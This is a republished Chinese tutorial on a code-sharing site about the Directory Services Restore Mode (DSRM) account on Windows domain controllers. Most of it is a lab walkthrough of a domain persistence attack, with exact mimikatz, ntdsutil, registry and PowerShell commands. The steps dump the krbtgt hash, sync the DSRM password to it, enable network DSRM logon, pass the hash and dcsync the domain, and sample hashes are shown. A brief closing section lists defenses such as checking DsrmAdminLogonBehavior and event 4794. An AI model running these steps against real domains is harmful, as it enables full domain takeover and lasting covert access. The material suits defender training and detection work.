碼上歡樂
相關內容    簡體    繁體

域控制器DSRM賬戶安全防護

本文轉載自   查看原文   2020-02-19 12:11   708    域滲透/ 內網滲透
一、DSRM簡介 
  1.DSRM(Diretcory Service Restore Mode,目錄服務恢復模式)是windows域環境中域控制器的安全模式啟動選項。域控制器的本地管理員賬戶也就是DSRM賬戶,DSRM密碼是在DC創建時設置的,一般很少更改。DSRM的用途是:允許管理員在域環境出現故障時還原、修復、重建活動目錄數據庫。通過在DC上運行ntdsutil 工具可以修改DSRM密碼。
  2.修改DSRM密碼的方法
  在域控制器上打開命令行環境,輸入“ntdsutil”,常用命令如下:
  set dsrm password :設置dsrm密碼
  reset password on server null :在當前域控制器上恢復dsrm密碼
  q :退出
  
 
  如果域控制器版本是windows2008(已安裝KB961320)及以上,可以將DSRM密碼同步為已存在的域用戶密碼。
ntdsutil # 打開命令行
set dsrm password
sync from Domain Account domainusername # 使dsrm的密碼和指定域用戶的密碼同步。
q:退出
 
二、.實驗操作
(1)使用mimikatz查看krbtgt的NTLM Hash
在域控制器中打開mimikatz,看到krbtgt的NTLM Hash為:ffc79c6f14bb2c39e6ceab183cefc9c5
privilege::debug
lsadump::lsa /patch /name:krbtgt
或者
mimikatz privilege::debug "lsadump::lsa /patch /name:krbtgt" > krbtgt.txt
 
(2)使用mimikatz讀取SAM文件中本地管理員(DSRM)的NTLM Hash
在域控制器中打開mimikatz,獲得DSRM賬號的NTLM Hash為:579da618cfbfa85247acf1f800a280a4
privilege::debug
token::elevate
lsadump::sam
 
(3)將DSRM賬號和krbtgt 的NTLM Hash同步
ntdsutil
set dsrm password
sync from Domain Account krbtgt
 
(4)查看dsrm的NTLM Hash是否同步成功
通過mimikatz,得到dsrm賬號的NTLM Hash為:ffc79c6f14bb2c39e6ceab183cefc9c5
mimikatz privilege::debug token::elevate lsadump::sam
 
(5)修改dsrm的登錄方式
在注冊表中新建HKLM:\System\CurrentControlSet\Control\Lsa\DsrmAdminLogonBehavior項。
  DSRM的三種登錄方式:
  0:默認值,只有當域控制器重啟並進入DSRM模式時,才可以使用DSRM管理員賬號。
  1:只有當本地AD、DS服務停止時,才可以使用DSRM管理員賬號登錄域控制器。
  2:在任何情況下,都可以使用DSRM管理員賬號登錄域控制器。
  在windows server 2000以后版本的操作系統中,對DSRM使用控制台登錄域控制器進行了限制.
如果要使用DSRM賬號通過網絡登錄域控制器,需要將該值設置為2,可用powershell進行更改。
New-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\" -name "DsrmAdminLogonBehavior" -value 2 -PropertyType DWORD
查看注冊表,發現已經DsrmAdminLogonBehavior鍵值已設置為2.
 
(6)使用DSRM賬號通過網絡遠程登錄域控制器
使用mimikatz進行哈希傳遞,在域成員機器的管理員模式下打開mimikatz,輸入如下命令:
privilege::debug
sekurlsa::pth /domain:DC /user:administrator /ntlm:ffc79c6f14bb2c39e6ceab183cefc9c5

 

(7)還用mimikatz的dcsync 功能遠程轉儲krbtgt的NTLM Hash
在哈希傳遞完成后,會彈出一個命令行窗口,在該命令行窗口中打開mimikatz。輸入如下命令:
mimikatz "lsadump::dcsync /domain:payload.com /dc:win-dc /user:krbtgt"
需要注意路徑:新開的窗口在system32下,需要切換到mimikatz所在目錄操作。
 
三、DSRM更改的防御措施
  1.定期檢查注冊表中用於控制DSRM登錄方式的鍵值HKLM\System\CurrentControlSet\Control\Lsa\DsrmAdminLogonBehavior,確認該鍵值為1,或者刪除該鍵值。
  2.定期修改域中所有域控制器的DSRM賬號。
  3.經常檢查ID為4794的日志,嘗試設置活動目錄服務還原模式的管理員密碼會被記錄在4794日志中。


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 車身域控制器 linux 安全防護 勒索安全防護 Windows server 2008 域控制器 華為CCA汽車域控制器 Web網站服務器安全防護措施 細數iOS上的那些安全防護 Windows Server 2016 部署AD域控制器及添加AD域控制器 Windows Server 2016 主域控制器搭建 Windows Server 2016 輔助域控制器搭建
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM